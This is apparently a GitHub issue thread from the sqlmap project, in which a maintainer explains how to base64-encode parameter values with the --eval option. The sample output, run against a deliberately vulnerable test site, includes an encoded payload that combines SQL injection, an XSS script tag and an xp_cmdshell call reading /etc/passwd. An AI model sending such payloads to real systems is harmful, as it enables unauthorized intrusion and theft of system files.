### ISSUE TITLE
base64 encoding input

### ISSUE THREAD

**Issue by s3c1t** [sqlmapproject/sqlmap#2242]
i have a target as As follows
www.target.com/page.aspx?id1=MQ==&id2=Mg==&id3=Mw==
Actually, value parameters encoded base64.
while decode base64 value parameters.
www.target.com/page.aspx?id1=1&id2=2&id3=3
Now my question is: how to encode base64 only value parameters by sqlmap and then send requests to target
for example:
python sqlmap.py -u "www.target.com/page.aspx?id1=MQ==&id2=Mg==&id3=Mw==" --encoding-input base64

**Comment by stamparm** [comment]
`--eval="id1=id1.encode('base64')"`, while you should put un-base64 encode value inside the original target url. For example:

```
$ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --eval="artist=artist.encode('base64')" -v 6 --flush-session --batch | grep Uri
Uri: http://testphp.vulnweb.com:80/artists.php?artist=MQ==%0A
Uri: http://testphp.vulnweb.com:80/artists.php?artist=MQ==%0A&aeDe%3D2434%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23
Uri: http://testphp.vulnweb.com:80/artists.php?artist=MQ==%0A
Uri: http://testphp.vulnweb.com:80/artists.php?artist=OTM3Nw==%0A
Uri: http://testphp.vulnweb.com:80/artists.php?artist=MSIpLCcoLi4uKSk=%0A
Uri: http://testphp.vulnweb.com:80/artists.php?artist=MSdGU3NBaUw8JyI%2BdnhWcWpP%0A
```

p.s. also, to replace those pesky whitespaces caused by base64 encoder, you could use: `"import re;id1=re.sub('\s', '', id1.encode('base64'))"`
